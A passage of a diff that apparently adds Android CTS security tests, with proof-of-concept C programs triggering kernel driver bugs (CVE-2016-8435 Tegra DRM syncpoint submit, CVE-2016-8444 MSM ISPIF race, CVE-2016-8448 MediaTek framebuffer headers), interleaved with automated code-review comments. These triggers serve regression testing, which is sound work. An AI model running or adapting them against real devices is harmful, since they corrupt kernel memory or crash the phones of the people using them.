+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8435
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h b/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h
new file mode 100644
index 0000000..70574fe
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h
@@ -0,0 +1,116 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __local_pwn_H__
+#define __local_pwn_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ /* sizeof(host1x_client) is 232 */
+ unsigned char pad[232]; /* maybe gadget arguments */
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+ /* FIXME we need pass lock op */
+ //struct mutex lock;
+ //bool keepon;
+ //struct host1x_user user;
+};
+
+#endif
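Review bot: This header uses `__u32`/`__u64` without including `<linux/types.h>`, so it presumably compiles only because poc.c includes other headers first; add `#include <linux/types.h>` under the guard. Most of what it declares is not referenced by poc.c in this change (the `SIOCIWFIRSTPRIV`/`PRIV_CMD_*` constants, `struct list_head`, `struct tegra_drm_client_ops`, `struct tegra_drm_client`, `struct tegra_drm_context`). Dropping those would leave a header that documents just the driver interface the test exercises. `DRM_IOCTL_TEGRA_CLOSE_CHANNEL` is built from `struct drm_tegra_open_channel` although `struct drm_tegra_close_channel` is defined just above; if that mirrors the driver's own header it deserves a comment, because the struct size is part of the ioctl number.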
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c
new file mode 100644
index 0000000..ff6acb0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/types.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+
+#include "local_pwn.h"
+
+#define DEV "/dev/dri/renderD129"
+#define SYN_NUM 64
+
+struct drm_tegra_open_channel open_c = { 0 };
+struct drm_tegra_submit submit_c = { 0 };
+struct drm_tegra_syncpt syncpts[SYN_NUM] = { 0 };
+
+int main()
+{
+ int ret;
+ int dev_fd;
+ int i;
+
+ /* open dev */
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ printf("[-] open dev failed %d %s\n", errno, strerror(errno));
+ return 0;
+ }
+
+ /* prepare for ioctl */
+ open_c.client = HOST1X_CLASS_VIC;
+ submit_c.num_syncpts = SYN_NUM;
+ submit_c.syncpts = (__u64)syncpts;
+
+ for(i = 1; i < SYN_NUM; i++){
+ syncpts[i].id = 192;
+ syncpts[i].incrs = 0xffff;
+ }
+
+ /* open channel */
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ printf("[-] open_channel failed %d %s\n", errno, strerror(errno));
+ goto out_dev;
+ }
+ submit_c.context = open_c.context;
+ printf("[+] call submit\n");
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ printf("[+] submit return %d\n", ret);
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
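Review bot: `submit_c.syncpts = (__u64)syncpts;` casts a pointer straight to a 64-bit integer, and since the module is built with `LOCAL_MULTILIB := both` the 32-bit build converts between differently sized types. Going through `uintptr_t` keeps it well defined: `submit_c.syncpts = (__u64)(uintptr_t)syncpts;` with `<stdint.h>` included. `main` also returns 0 on every path, including the failed `open()` and the failed open-channel ioctl, so the exit status cannot tell the host-side test whether the device node was absent or the submit actually ran; a distinct non-zero code on the two error paths would fix that. The fill loop starts at `i = 1` and uses the bare constants `192` and `0xffff`; a one-line comment on why entry 0 is skipped and what the values stand for would help the next maintainer.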
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk
new file mode 100644
index 0000000..50e2f6a
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8444
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c
new file mode 100644
index 0000000..d681a43
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c
@@ -0,0 +1,78 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/syscall.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+
+#define MSM_SD_SHUTDOWN 0xc00856dd
+#define VIDIOC_MSM_ISPIF_CFG 0xc17056c0
+
+struct ispif_cfg_data {
+ int32_t cfg_type;
+ union {
+ int reg_dump; /* ISPIF_ENABLE_REG_DUMP */
+ uint32_t csid_version; /* ISPIF_INIT */
+ //struct msm_ispif_vfe_info vfe_info; /* ISPIF_SET_VFE_INFO */
+ //struct msm_ispif_param_data params; /* CFG, START, STOP */
+ };
+};
+
+long r[11];
+
+int fd;
+struct ispif_cfg_data data;
+
+void *worker_thread(void *arg) {
+
+ int arg1[3] = {0};
+ switch ((long)arg) {
+ case 0:
+ data.cfg_type = 8; ////release
+ ioctl(fd, VIDIOC_MSM_ISPIF_CFG, &data);
+ break;
+ case 1:
+ ioctl(fd, MSM_SD_SHUTDOWN, &arg1);
+ break;
+ }
+ return NULL;
+}
+
+int main() {
+
+ int pid,i;
+ pthread_t th[4];
+ fd = open( "/dev/v4l-subdev17", 0x0ul );
+
+ printf("please wait for several seconds...\n");
+
+ while(1){
+
+ data.cfg_type = 2; ////init
+ data.csid_version = 1;
+ ioctl(fd, VIDIOC_MSM_ISPIF_CFG, &data);
+
+ for (i = 0; i < 2; i++) {
+ pthread_create(&th[i], 0, worker_thread, (void *)(long)i);
+ usleep(10);
+ }
+ }
+ return 0;
+}
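Review bot: `main` never checks `fd` after `open("/dev/v4l-subdev17", ...)` and then creates two threads per iteration of an endless `while(1)` without ever joining or detaching them. On a device without that node the test spins on an invalid descriptor and leaks thread resources until `pthread_create` starts failing. Add `if (fd < 0) { perror("open"); return 0; }` after the open and a `pthread_join(th[i], NULL);` pass after the inner loop, or create the threads detached. `ioctl()` is called without `#include <sys/ioctl.h>`, which leaves it implicitly declared. `pid` and `r[11]` are unused, and `th` has four slots where only two are written.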
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk
new file mode 100644
index 0000000..cd6049f
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8448
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h
new file mode 100644
index 0000000..b33073c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h
@@ -0,0 +1,397 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __MTKFB_H
+#define __MTKFB_H
+
+#include <linux/types.h>
+#include "mtkfb_info.h"
+
+
+/**NOTICE:
+ * Must be consistent with bionic/libc/kernel/linux/common/mtkfb.h
+ */
+#define MTK_FB_NO_ION_FD ((int)(~0U>>1))
+#define MTK_FB_NO_USE_LAEYR_ID ((int)(~0U>>1))
+#define FBCAPS_GENERIC_MASK (0x00000fff)
+#define FBCAPS_LCDC_MASK (0x00fff000)
+#define FBCAPS_PANEL_MASK (0xff000000)
+#define FBCAPS_MANUAL_UPDATE (0x00001000)
+#define FBCAPS_SET_BACKLIGHT (0x01000000)
+#define MTKFB_ERROR_IS_EARLY_SUSPEND (0x12000000)
+/* --------------------------------------------------------------------------- */
+/* IOCTL commands. */
+#define MTK_IOW(num, dtype) _IOW('O', num, dtype)
+#define MTK_IOR(num, dtype) _IOR('O', num, dtype)
+#define MTK_IOWR(num, dtype) _IOWR('O', num, dtype)
+#define MTK_IO(num) _IO('O', num)
+#define MTKFB_QUEUE_OVERLAY_CONFIG MTK_IOW(137, struct fb_overlay_config)
+/* -------------------------------------------------------------------------- */
+#define MTKFB_SET_OVERLAY_LAYER MTK_IOW(0, struct fb_overlay_layer)
+#define MTKFB_TRIG_OVERLAY_OUT MTK_IO(1)
+#define MTKFB_SET_VIDEO_LAYERS MTK_IOW(2, struct fb_overlay_layer)
+#define MTKFB_CAPTURE_FRAMEBUFFER MTK_IOW(3, unsigned long)
+#define MTKFB_CONFIG_IMMEDIATE_UPDATE MTK_IOW(4, unsigned long)
+#define MTKFB_SET_MULTIPLE_LAYERS MTK_IOW(5, struct fb_overlay_layer)
+#define MTKFB_REGISTER_OVERLAYBUFFER MTK_IOW(6, struct fb_overlay_buffer_info)
+#define MTKFB_UNREGISTER_OVERLAYBUFFER MTK_IOW(7, unsigned int)
+#define MTKFB_SET_ORIENTATION MTK_IOW(8, unsigned long)
+#define MTKFB_FBLAYER_ENABLE MTK_IOW(9, unsigned int)
+#define MTKFB_LOCK_FRONT_BUFFER MTK_IO(10)
+#define MTKFB_UNLOCK_FRONT_BUFFER MTK_IO(11)
+#define MTKFB_POWERON MTK_IO(12)
+#define MTKFB_POWEROFF MTK_IO(13)
+
+/* Fence/Ion, OVL decoupling */
+#define MTKFB_PREPARE_OVERLAY_BUFFER MTK_IOW(14, struct fb_overlay_buffer)
+
+/* S3D control */
+#define MTKFB_SET_COMPOSING3D MTK_IOW(15, unsigned long)
+#define MTKFB_SET_S3D_FTM MTK_IOW(16, unsigned long)
+
+/* FM De-sense for EM and Normal mode */
+#define MTKFB_GET_DEFAULT_UPDATESPEED MTK_IOR(17, unsigned long)
+#define MTKFB_GET_CURR_UPDATESPEED MTK_IOR(18, unsigned long)
+/* for EM, not called change writecycle because DPI change pll ckl */
+#define MTKFB_CHANGE_UPDATESPEED MTK_IOW(19, unsigned long)
+#define MTKFB_GET_INTERFACE_TYPE MTK_IOR(20, unsigned long) /* /0 DBI, 1 DPI, 2 MIPI */
+#define MTKFB_GET_POWERSTATE MTK_IOR(21, unsigned long) /* /0: power off 1: power on */
+#define MTKFB_GET_DISPLAY_IF_INFORMATION MTK_IOR(22, mtk_dispif_info_t)
+/*called before SET_OVERLAY each time, if true, hwc will not use FB_LAYER again*/
+#define MTKFB_AEE_LAYER_EXIST MTK_IOR(23, unsigned long)
+#define MTKFB_GET_OVERLAY_LAYER_INFO MTK_IOR(24, struct fb_overlay_layer_info)
+#define MTKFB_FACTORY_AUTO_TEST MTK_IOR(25, unsigned long)
+#define MTKFB_GET_FRAMEBUFFER_MVA MTK_IOR(26, unsigned int)
+#define MTKFB_SLT_AUTO_CAPTURE MTK_IOWR(27, struct fb_slt_catpure)
+
+/*error handling*/
+#define MTKFB_META_RESTORE_SCREEN MTK_IOW(101, unsigned long)
+#define MTKFB_ERROR_INDEX_UPDATE_TIMEOUT MTK_IO(103)
+#define MTKFB_ERROR_INDEX_UPDATE_TIMEOUT_AEE MTK_IO(104)
+
+/*restore bootlogo and character in meta mode*/
+#define MTKFB_META_SHOW_BOOTLOGO MTK_IO(105)
+
+/*Extension FB active option*/
+#define FB_ACTIVATE_NO_UPDATE 512 /* Skip frame update */
+/**
+ * Just for mt6589 Platform
+ * @{
+ */
+#define MTKFB_GETVFRAMEPHYSICAL MTK_IOW(41, unsigned long)
+#define MTKFB_WAIT_OVERLAY_READY MTK_IO(42)
+#define MTKFB_GET_OVERLAY_LAYER_COUNT MTK_IOR(43, unsigned long)
+#define MTKFB_GET_VIDEOLAYER_SIZE MTK_IOR(44, struct fb_overlay_layer)
+#define MTKFB_CAPTURE_VIDEOBUFFER MTK_IOW(45, unsigned long)
+
+/* -------------------------------------------------------------------------- */
+/* Video Playback Mode */
+#define MTKFB_TV_POST_VIDEO_BUFFER MTK_IOW(46, unsigned long)
+#define MTKFB_TV_LEAVE_VIDEO_PLAYBACK_MODE MTK_IOW(47, unsigned long)
+/* For Factory Mode */
+#define MTKFB_IS_TV_CABLE_PLUG_IN MTK_IOW(48, unsigned long)
+
+/* -------------------------------------------------------------------------- */
+#define MTKFB_BOOTANIMATION MTK_IO(49)
+#define MTKFB_GETFPS MTK_IOW(50, unsigned long)
+#define MTKFB_VSYNC MTK_IO(51)
+
+/* ----------------------------------------------------------------------FM De-sense for EM and Normal mode */
+#define MTKFB_FM_NOTIFY_FREQ MTK_IOW(52, unsigned long) /* for Normal mode */
+#define MTKFB_RESET_UPDATESPEED MTK_IO(53)
+#define MTKFB_SET_UI_LAYER_ALPHA MTK_IOW(54, unsigned long)
+#define MTKFB_SET_UI_LAYER_SRCKEY MTK_IOW(55, unsigned long)
+
+#define MTKFB_GET_MAX_DISPLAY_COUNT MTK_IOR(56, unsigned int)
+#define MTKFB_SET_FB_LAYER_SECURE MTK_IOW(57, int)
+/**
+ * @}
+ */
+/* ---------------------------------------------------------------------- */
+
+/* -------------------------------------------------------------------------- */
+
+typedef enum {
+ MTK_FB_ORIENTATION_0 = 0,
+ MTK_FB_ORIENTATION_90 = 1,
+ MTK_FB_ORIENTATION_180 = 2,
+ MTK_FB_ORIENTATION_270 = 3,
+} MTK_FB_ORIENTATION;
+
+
+typedef enum {
+ MTK_FB_TV_SYSTEM_NTSC = 0,
+ MTK_FB_TV_SYSTEM_PAL = 1,
+} MTK_FB_TV_SYSTEM;
+
+
+typedef enum {
+ MTK_FB_TV_FMT_RGB565 = 0,
+ MTK_FB_TV_FMT_YUV420_SEQ = 1,
+ MTK_FB_TV_FMT_UYUV422 = 2,
+ MTK_FB_TV_FMT_YUV420_BLK = 3,
+} MTK_FB_TV_SRC_FORMAT;
+
+typedef enum {
+ LAYER_NORMAL_BUFFER = 0,
+ LAYER_SECURE_BUFFER = 1,
+ LAYER_PROTECTED_BUFFER = 2,
+ LAYER_SECURE_BUFFER_WITH_ALIGN = 0x10001, /* the higher 16 bits =1 for adding 64 bytes alignment */
+} MTK_FB_OVL_LAYER_SECURE_MODE;
+
+typedef struct _disp_dfo_item {
+ char name[32];
+ int value;
+} disp_dfo_item_t;
+
+/* -------------------------------------------------------------------------- */
+struct fb_slt_catpure {
+ MTK_FB_FORMAT format;
+
+ volatile char *outputBuffer;
+ unsigned int wdma_width;
+ unsigned int wdma_height;
+};
+
+struct fb_scale {
+ unsigned int xscale, yscale;
+};
+
+struct fb_frame_offset {
+ unsigned int idx;
+ unsigned long offset;
+};
+
+struct fb_update_window {
+ unsigned int x, y;
+ unsigned int width, height;
+};
+
+typedef enum {
+ LAYER_2D = 0,
+ LAYER_3D_SBS_0 = 0x1,
+ LAYER_3D_SBS_90 = 0x2,
+ LAYER_3D_SBS_180 = 0x3,
+ LAYER_3D_SBS_270 = 0x4,
+ LAYER_3D_TAB_0 = 0x10,
+ LAYER_3D_TAB_90 = 0x20,
+ LAYER_3D_TAB_180 = 0x30,
+ LAYER_3D_TAB_270 = 0x40,
+} MTK_FB_LAYER_TYPE;
+
+typedef enum {
+ DISP_DIRECT_LINK_MODE,
+ DISP_DECOUPLE_MODE
+} MTK_DISP_MODE;
+struct fb_overlay_mode {
+ MTK_DISP_MODE mode;
+};
+
+typedef enum { /* map sessions to scenairos in kernel driver */
+ DISP_SESSION_LCM = 1 << 0, /* DSI0 */
+ DISP_SESSION_MEM = 1 << 1, /* OVL0->WDMA0 */
+/* Extension mode, Dst buf is provided by user,for Wifi Display or other purpose */
+ DISP_SESSION_WFD = 1 << 2,
+ DISP_SESSION_MHL = 1 << 3, /* DPI */
+ DISP_SESSION_LCM1 = 1 << 4, /* DSI1 */
+ DISP_SESSION_MEM1 = 1 << 5, /* OVL1->WDMA1 */
+ /* TODO:can be extended with other Session Id */
+ SESSION_MASK = 0xff & ~(1 << 6)
+} MTK_DISP_SESSION;
+
+struct fb_overlay_session {
+ unsigned int session; /* one or more @MTK_DISP_SESSION combined */
+};
+
+struct fb_overlay_decouple {
+ MTK_DISP_MODE mode;
+ unsigned int session;
+};
+struct fb_overlay_buffer {
+ /* Input */
+ int layer_id;
+ unsigned int layer_en;
+ int ion_fd;
+ unsigned int cache_sync;
+ /* Output */
+ unsigned int index;
+ int fence_fd;
+};
+
+struct fb_overlay_layer {
+ unsigned int layer_id;
+ unsigned int layer_enable;
+
+ void *src_base_addr;
+ void *src_phy_addr;
+ unsigned int src_direct_link;
+ MTK_FB_FORMAT src_fmt;
+ unsigned int src_use_color_key;
+ unsigned int src_color_key;
+ unsigned int src_pitch;
+ unsigned int src_offset_x, src_offset_y;
+ unsigned int src_width, src_height;
+
+ unsigned int tgt_offset_x, tgt_offset_y;
+ unsigned int tgt_width, tgt_height;
+ MTK_FB_ORIENTATION layer_rotation;
+ MTK_FB_LAYER_TYPE layer_type;
+ MTK_FB_ORIENTATION video_rotation;
+
+ unsigned int isTdshp; /* set to 1, will go through tdshp first, then layer blending, then to color */
+
+ int next_buff_idx;
+ int identity;
+ int connected_type;
+ unsigned int security;
+ unsigned int alpha_enable;
+ unsigned int alpha;
+ int fence_fd; /* 8135 */
+ int ion_fd; /* 8135 CL 2340210 */
+};
+
+struct fb_overlay_config {
+ int fence;
+ int time;
+ struct fb_overlay_layer layers[4];
+};
+
+struct fb_overlay_buffer_info {
+ unsigned int src_vir_addr;
+ unsigned int size;
+};
+
+struct fb_overlay_layer_info {
+ unsigned int layer_id;
+ unsigned int layer_enabled; /* TO BE DEL */
+ unsigned int curr_en;
+ unsigned int next_en;
+ unsigned int hw_en;
+ int curr_idx;
+ int next_idx;
+ int hw_idx;
+ int curr_identity;
+ int next_identity;
+ int hw_identity;
+ int curr_conn_type;
+ int next_conn_type;
+ int hw_conn_type;
+ MTK_FB_ORIENTATION layer_rotation;
+};
+/* -------------------------------------------------------------------------- */
+
+struct fb_post_video_buffer {
+ void *phy_addr;
+ void *vir_addr;
+ MTK_FB_TV_SRC_FORMAT format;
+ unsigned int width, height;
+};
+
+#if defined(CONFIG_ARCH_MT6735) || defined(CONFIG_ARCH_MT6735M) || defined(CONFIG_ARCH_MT6753)
+extern unsigned int EnableVSyncLog;
+
+void mtkfb_log_enable(int enable);
+int mtkfb_set_backlight_mode(unsigned int mode);
+int mtkfb_set_backlight_level(unsigned int level);
+int mtkfb_get_debug_state(char *stringbuf, int buf_len);
+unsigned int mtkfb_fm_auto_test(void);
+void mtkfb_clear_lcm(void);
+#endif /* CONFIG_ARCH_MT6735 */
+
+#ifdef __KERNEL__
+
+#include <linux/completion.h>
+#include <linux/interrupt.h>
+#include <linux/workqueue.h>
+#include <linux/version.h>
+#include <../drivers/staging/android/sw_sync.h>
+
+
+#define MTKFB_DRIVER "mtkfb"
+
+enum mtkfb_state {
+ MTKFB_DISABLED = 0,
+ MTKFB_SUSPENDED = 99,
+ MTKFB_ACTIVE = 100
+};
+
+typedef enum {
+ MTKFB_LAYER_ENABLE_DIRTY = (1 << 0),
+ MTKFB_LAYER_FORMAT_DIRTY = (1 << 1),
+ MTKFB_LAYER_SET_DIRTY = (1 << 2),
+} MTKFB_LAYER_CONFIG_DIRTY;
+
+typedef struct {
+ struct work_struct work;
+ struct list_head list;
+ struct fb_overlay_config config;
+ struct sync_fence *fences[4];
+ struct ion_handle *ion_handles[4];
+ void *dev;
+} update_ovls_work_t;
+
+struct mtkfb_device {
+ int state;
+ void *fb_va_base; /* MPU virtual address */
+ dma_addr_t fb_pa_base; /* Bus physical address */
+ unsigned long fb_size_in_byte;
+ void *ovl_va_base; /* MPU virtual address */
+ dma_addr_t ovl_pa_base; /* Bus physical address */
+ unsigned long ovl_size_in_byte;
+
+ unsigned long layer_enable;
+ MTK_FB_FORMAT *layer_format;
+ unsigned int layer_config_dirty;
+
+ int xscale, yscale, mirror; /* transformations.
+ rotate is stored in fb_info->var */
+ u32 pseudo_palette[17];
+
+ struct fb_info *fb_info; /* Linux fbdev framework data */
+ struct device *dev;
+
+ /* Android native fence support */
+ struct workqueue_struct *update_ovls_wq;
+ struct mutex timeline_lock;
+ struct sw_sync_timeline *timeline;
+ int timeline_max;
+ struct list_head pending_configs; /* CL2340210 */
+ struct ion_client *ion_client;
+};
+
+#endif /* __KERNEL__ */
+
+extern long hdmi_handle_cmd(unsigned int cmd, unsigned long arg);
+
+#if defined(CONFIG_ARCH_MT6797)
+extern unsigned int vramsize;
+#endif
+
+#if defined(CONFIG_ARCH_MT6735) || defined(CONFIG_ARCH_MT6735M) || defined(CONFIG_ARCH_MT6753)
+extern bool is_early_suspended;
+extern void mtkfb_waitVsync(void);
+extern bool is_ipoh_bootup;
+
+#ifdef CONFIG_OF
+int _parse_tag_videolfb(void);
+extern unsigned int islcmconnected;
+extern unsigned int vramsize;
+#else
+extern char *saved_command_line;
+#endif
+#endif /* CONFIG_ARCH_MT6735 */
+
+
+#endif /* __MTKFB_H */
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h
new file mode 100644
index 0000000..61e7cfd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h
@@ -0,0 +1,101 @@
